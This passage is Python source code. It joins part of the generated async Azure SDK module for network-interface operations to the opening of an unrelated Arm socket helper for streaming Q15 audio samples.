) -> Optional["_models.EffectiveNetworkSecurityGroupListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveNetworkSecurityGroupListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
async def begin_list_effective_network_security_groups(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveNetworkSecurityGroupListResult"]:
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_08_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
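# --- Illustrative usage (not part of the generated client) -----------------
# A minimal sketch of consuming the AsyncItemPaged returned by the listing
# method above. The credential and client wiring below are assumptions for
# demonstration only; just the operations method itself comes from this module.
import asyncio
from azure.identity.aio import DefaultAzureCredential
from azure.mgmt.network.aio import NetworkManagementClient

async def _demo_list_vmss_nics(resource_group: str, vmss_name: str) -> None:
    async with DefaultAzureCredential() as credential:
        async with NetworkManagementClient(credential, "<subscription-id>") as client:
            pager = client.network_interfaces.list_virtual_machine_scale_set_network_interfaces(
                resource_group, vmss_name)
            async for nic in pager:  # AsyncItemPaged follows next_link transparently
                print(nic.name)

# asyncio.run(_demo_list_vmss_nics("<resource-group>", "<vmss-name>"))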
async def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_virtual_machine_scale_set_ip_configurations(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceIPConfigurationListResult"]:
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_ip_configurations.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_ip_configurations.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
async def get_virtual_machine_scale_set_ip_configuration(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
ip_configuration_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterfaceIPConfiguration":
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration.
:type ip_configuration_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_ip_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_ip_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
def list_cloud_service_role_instance_network_interfaces(
self,
resource_group_name: str,
cloud_service_name: str,
role_instance_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets information about all network interfaces in a role instance in a cloud service.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cloud_service_name: The name of the cloud service.
:type cloud_service_name: str
:param role_instance_name: The name of role instance.
:type role_instance_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_cloud_service_role_instance_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'cloudServiceName': self._serialize.url("cloud_service_name", cloud_service_name, 'str'),
'roleInstanceName': self._serialize.url("role_instance_name", role_instance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_cloud_service_role_instance_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/cloudServices/{cloudServiceName}/roleInstances/{roleInstanceName}/networkInterfaces'} # type: ignore
def list_cloud_service_network_interfaces(
self,
resource_group_name: str,
cloud_service_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a cloud service.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cloud_service_name: The name of the cloud service.
:type cloud_service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_cloud_service_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'cloudServiceName': self._serialize.url("cloud_service_name", cloud_service_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_cloud_service_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/cloudServices/{cloudServiceName}/networkInterfaces'} # type: ignore
async def get_cloud_service_network_interface(
self,
resource_group_name: str,
cloud_service_name: str,
role_instance_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Get the specified network interface in a cloud service.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cloud_service_name: The name of the cloud service.
:type cloud_service_name: str
:param role_instance_name: The name of role instance.
:type role_instance_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get_cloud_service_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'cloudServiceName': self._serialize.url("cloud_service_name", cloud_service_name, 'str'),
'roleInstanceName': self._serialize.url("role_instance_name", role_instance_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_cloud_service_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/cloudServices/{cloudServiceName}/roleInstances/{roleInstanceName}/networkInterfaces/{networkInterfaceName}'} # type: ignore
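# --- Illustrative usage (not part of the generated client) -----------------
# A sketch of calling one of the single-resource "get" coroutines defined
# above, reusing the imports from the earlier sketch. Names in angle brackets
# are placeholders; the credential setup is an assumption for demonstration.
async def _demo_get_cloud_service_nic() -> None:
    async with DefaultAzureCredential() as credential:
        async with NetworkManagementClient(credential, "<subscription-id>") as client:
            nic = await client.network_interfaces.get_cloud_service_network_interface(
                "<resource-group>", "<cloud-service>", "<role-instance>", "<nic-name>",
                expand="ipConfigurations")
            print(nic.name, nic.id)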
# Source: Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/aio/operations/_network_interfaces_operations.py | Python | MIT license | 72,800 bytes
# --------------------------------------------------------------------------
# Copyright (c) 2020-2022 Arm Limited (or its affiliates). All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
import sys
# VSI KIND
VSIOUTPUT = 0
VSIINPUT = 1
# MESSAGE IDs
CLIENTREADBUF=1
CLIENTWRITEBUF=2
CLIENTSTOP=3
# PACKETSIZE : default number of bytes read on a socket
PACKETSIZE = 1024
# Conversion between sizes expressed in bytes and in Q15 samples
INTSIZE = 2
# Error raised when trying to read / write to sockets
class ErrorTooMuchDataReceived(Exception):
pass
class CantReceiveData(Exception):
pass
def clientID(inputMode,theID):
return([(theID << 1) | inputMode])
# Receive a given number of bytes
# Socket is read by block of PACKETSIZE
def receiveBytes(conn,nb):
data = b""
while nb > 0:
if nb < PACKETSIZE:
newData = conn.recv(nb)
if not newData: raise CantReceiveData
else:
newData= conn.recv(PACKETSIZE)
if not newData: raise CantReceiveData
nb = nb - len(newData)
if nb < 0:
raise ErrorTooMuchDataReceived
data += newData
return(data)
# Send bytes
def sendBytes(conn,data):
conn.sendall(data)
# Convert a list of Q15 to a bytestream
def list_to_bytes(l):
return(b"".join([x.to_bytes(INTSIZE,byteorder=sys.byteorder,signed=True) for x in l]))
# Convert a bytestream to a list of Q15
def bytes_to_list(l):
res=[]
i = 0
while(i<len(l)):
res.append(int.from_bytes(l[i:i+INTSIZE],byteorder=sys.byteorder,signed=True))
i = i+INTSIZE
return(res)
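# Round-trip sketch (illustrative, not part of the original module): a list
# of Q15 samples should survive conversion to bytes and back unchanged.
def _demo_q15_roundtrip():
    samples = [0, 1, -1, 32767, -32768]
    assert bytes_to_list(list_to_bytes(samples)) == samples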
# Send a list of Q15
def sendIntList(conn,l):
data = list_to_bytes(l)
sendBytes(conn,data)
# Receive a list of Q15
def getIntList(conn,length):
data = receiveBytes(conn,INTSIZE*length)
